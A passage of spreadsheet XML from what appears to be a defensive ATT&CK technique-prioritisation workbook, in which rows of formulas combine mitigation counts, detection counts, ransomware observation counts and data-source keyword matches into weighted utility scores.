        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.51904761904761898</v>
      </c>
      <c r="W89">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>53</v>
      </c>
      <c r="X89">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.96363636363636362</v>
      </c>
      <c r="Y89">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.96363636363636362</v>
      </c>
      <c r="Z89">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA89">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB89">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC89" s="29" t="s">
        <v>442</v>
      </c>
      <c r="AD89" s="25" t="str" cm="1">
        <f t="array" ref="AD89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC89)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE89" s="25">
        <f>IF(AD89="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF89" s="25" t="str" cm="1">
        <f t="array" ref="AF89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC89)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG89" s="25">
        <f>IF(AF89="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH89" s="25" t="str" cm="1">
        <f t="array" ref="AH89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC89)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI89" s="25">
        <f>IF(AH89="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ89" s="25" t="str" cm="1">
        <f t="array" ref="AJ89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC89)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK89" s="25">
        <f>IF(AJ89="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL89" s="25" t="str" cm="1">
        <f t="array" ref="AL89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC89)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM89" s="25">
        <f>IF(AL89="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN89" s="52">
        <v>0</v>
      </c>
      <c r="AO89" s="51">
        <v>0</v>
      </c>
      <c r="AP89" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.8562967080190481E-2</v>
      </c>
      <c r="AQ89" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.32854322360063493</v>
      </c>
      <c r="AR89" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.32854322360063493</v>
      </c>
      <c r="AS89" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT89" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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90" spans="1:47">
      <c r="A90" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1064284952380951E-2</v>
      </c>
      <c r="B90" s="25">
        <f>SUM(H90,M90,V90)*(1+SUM(AE90,AG90,AI90,AK90,AM90))</f>
        <v>0.21064284952380952</v>
      </c>
      <c r="C90" s="25" t="s">
        <v>443</v>
      </c>
      <c r="D90" s="25" t="s">
        <v>444</v>
      </c>
      <c r="E90" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F90" s="51">
        <v>1</v>
      </c>
      <c r="G90" s="51">
        <v>1</v>
      </c>
      <c r="H90" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I90">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J90">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K90">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L90">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M90" s="44">
        <v>1.11904E-3</v>
      </c>
      <c r="N90" s="51">
        <v>0</v>
      </c>
      <c r="O90" s="51">
        <v>3</v>
      </c>
      <c r="P90" s="51">
        <v>0</v>
      </c>
      <c r="Q90" s="51">
        <v>8</v>
      </c>
      <c r="R90" s="51"/>
      <c r="S90" s="51">
        <v>1</v>
      </c>
      <c r="T90" s="52" t="s">
        <v>445</v>
      </c>
      <c r="U90" s="51">
        <v>5</v>
      </c>
      <c r="V90" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.10952380952380952</v>
      </c>
      <c r="W90">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X90">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y90">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z90">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA90">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB90">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC90" s="29"/>
      <c r="AD90" s="25" t="str" cm="1">
        <f t="array" ref="AD90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC90)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE90" s="25">
        <f>IF(AD90="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF90" s="25" t="str" cm="1">
        <f t="array" ref="AF90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC90)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG90" s="25">
        <f>IF(AF90="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH90" s="25" t="str" cm="1">
        <f t="array" ref="AH90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC90)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI90" s="25">
        <f>IF(AH90="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ90" s="25" t="str" cm="1">
        <f t="array" ref="AJ90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC90)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK90" s="25">
        <f>IF(AJ90="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL90" s="25" t="str" cm="1">
        <f t="array" ref="AL90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC90)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM90" s="25">
        <f>IF(AL90="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN90" s="60">
        <v>0</v>
      </c>
      <c r="AO90" s="51">
        <v>0</v>
      </c>
      <c r="AP90" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1064284952380951E-2</v>
      </c>
      <c r="AQ90" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.0214283174603168E-2</v>
      </c>
      <c r="AR90" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.0214283174603168E-2</v>
      </c>
      <c r="AS90" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT90" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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91" spans="1:47" ht="48">
      <c r="A91" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14564549445666669</v>
      </c>
      <c r="B91" s="25">
        <f>SUM(H91,M91,V91)*(1+SUM(AE91,AG91,AI91,AK91,AM91))</f>
        <v>0.78978827790000006</v>
      </c>
      <c r="C91" s="25" t="s">
        <v>446</v>
      </c>
      <c r="D91" s="25" t="s">
        <v>447</v>
      </c>
      <c r="E91" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F91" s="51">
        <v>2</v>
      </c>
      <c r="G91" s="51">
        <v>5</v>
      </c>
      <c r="H91" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I91">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J91">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K91">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L91">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M91" s="44">
        <v>9.6862999999999995E-4</v>
      </c>
      <c r="N91" s="51">
        <v>0</v>
      </c>
      <c r="O91" s="51">
        <v>3</v>
      </c>
      <c r="P91" s="51">
        <v>2</v>
      </c>
      <c r="Q91" s="51">
        <v>8</v>
      </c>
      <c r="R91" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S91" s="51">
        <v>8</v>
      </c>
      <c r="T91" s="52" t="s">
        <v>448</v>
      </c>
      <c r="U91" s="51">
        <v>11</v>
      </c>
      <c r="V91" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.24285714285714288</v>
      </c>
      <c r="W91">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X91">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y91">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z91">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>13</v>
      </c>
      <c r="AA91">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.13</v>
      </c>
      <c r="AB91">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.13</v>
      </c>
      <c r="AC91" s="29" t="s">
        <v>449</v>
      </c>
      <c r="AD91" s="25" t="str" cm="1">
        <f t="array" ref="AD91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC91)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE91" s="25">
        <f>IF(AD91="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF91" s="25" t="str" cm="1">
        <f t="array" ref="AF91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC91)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG91" s="25">
        <f>IF(AF91="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH91" s="25" t="str" cm="1">
        <f t="array" ref="AH91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC91)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI91" s="25">
        <f>IF(AH91="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ91" s="25" t="str" cm="1">
        <f t="array" ref="AJ91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC91)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK91" s="25">
        <f>IF(AJ91="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL91" s="25" t="str" cm="1">
        <f t="array" ref="AL91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC91)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM91" s="25">
        <f>IF(AL91="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN91" s="52">
        <v>2</v>
      </c>
      <c r="AO91" s="51">
        <v>1</v>
      </c>
      <c r="AP91" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14564549445666669</v>
      </c>
      <c r="AQ91" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.26326275930000004</v>
      </c>
      <c r="AR91" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.26326275930000004</v>
      </c>
      <c r="AS91" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT91" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU9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92" spans="1:47">
      <c r="A92" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.0087447000000001E-2</v>
      </c>
      <c r="B92" s="25">
        <f>SUM(H92,M92,V92)*(1+SUM(AE92,AG92,AI92,AK92,AM92))</f>
        <v>0.10087447000000001</v>
      </c>
      <c r="C92" s="25" t="s">
        <v>450</v>
      </c>
      <c r="D92" s="25" t="s">
        <v>451</v>
      </c>
      <c r="E92" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F92" s="51">
        <v>1</v>
      </c>
      <c r="G92" s="51">
        <v>1</v>
      </c>
      <c r="H92" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I92">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J92">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K92">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L92">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M92" s="44">
        <v>8.7447000000000002E-4</v>
      </c>
      <c r="N92" s="51">
        <v>0</v>
      </c>
      <c r="O92" s="51">
        <v>0</v>
      </c>
      <c r="P92" s="51">
        <v>0</v>
      </c>
      <c r="Q92" s="51">
        <v>0</v>
      </c>
      <c r="R92" s="51"/>
      <c r="S92" s="51">
        <v>0</v>
      </c>
      <c r="T92" s="51"/>
      <c r="U92" s="51">
        <v>0</v>
      </c>
      <c r="V92" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W92">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X92">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y92">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z92">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA92">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB92">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC92" s="29" t="s">
        <v>452</v>
      </c>
      <c r="AD92" s="25" t="str" cm="1">
        <f t="array" ref="AD92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC92)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE92" s="25">
        <f>IF(AD92="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF92" s="25" t="str" cm="1">
        <f t="array" ref="AF92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC92)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG92" s="25">
        <f>IF(AF92="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH92" s="25" t="str" cm="1">
        <f t="array" ref="AH92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC92)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI92" s="25">
        <f>IF(AH92="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ92" s="25" t="str" cm="1">
        <f t="array" ref="AJ92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC92)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK92" s="25">
        <f>IF(AJ92="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL92" s="25" t="str" cm="1">
        <f t="array" ref="AL92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC92)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM92" s="25">
        <f>IF(AL92="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN92" s="62">
        <v>0</v>
      </c>
      <c r="AO92" s="51">
        <v>0</v>
      </c>
      <c r="AP92" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.0087447000000001E-2</v>
      </c>
      <c r="AQ92" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3624823333333338E-2</v>
      </c>
      <c r="AR92" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3624823333333338E-2</v>
      </c>
      <c r="AS92" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT92" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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93" spans="1:47" ht="32.1">
      <c r="A93" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26993031350980956</v>
      </c>
      <c r="B93" s="25">
        <f>SUM(H93,M93,V93)*(1+SUM(AE93,AG93,AI93,AK93,AM93))</f>
        <v>0.36596980176476196</v>
      </c>
      <c r="C93" s="25" t="s">
        <v>453</v>
      </c>
      <c r="D93" s="25" t="s">
        <v>454</v>
      </c>
      <c r="E93" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F93" s="51">
        <v>1</v>
      </c>
      <c r="G93" s="51">
        <v>1</v>
      </c>
      <c r="H93" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I93">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J93">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K93">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L93">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M93" s="44">
        <v>7.2207E-4</v>
      </c>
      <c r="N93" s="51">
        <v>0</v>
      </c>
      <c r="O93" s="51">
        <v>2</v>
      </c>
      <c r="P93" s="51">
        <v>0</v>
      </c>
      <c r="Q93" s="51">
        <v>1</v>
      </c>
      <c r="R93" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S93" s="51">
        <v>2</v>
      </c>
      <c r="T93" s="51" t="s">
        <v>455</v>
      </c>
      <c r="U93" s="51">
        <v>18</v>
      </c>
      <c r="V93" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20476190476190478</v>
      </c>
      <c r="W93">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>20</v>
      </c>
      <c r="X93">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Y93">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Z93">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA93">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB93">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC93" s="29" t="s">
        <v>300</v>
      </c>
      <c r="AD93" s="25" t="str" cm="1">
        <f t="array" ref="AD93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC93)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE93" s="25">
        <f>IF(AD93="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF93" s="25" t="str" cm="1">
        <f t="array" ref="AF93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC93)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG93" s="25">
        <f>IF(AF93="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH93" s="25" t="str" cm="1">
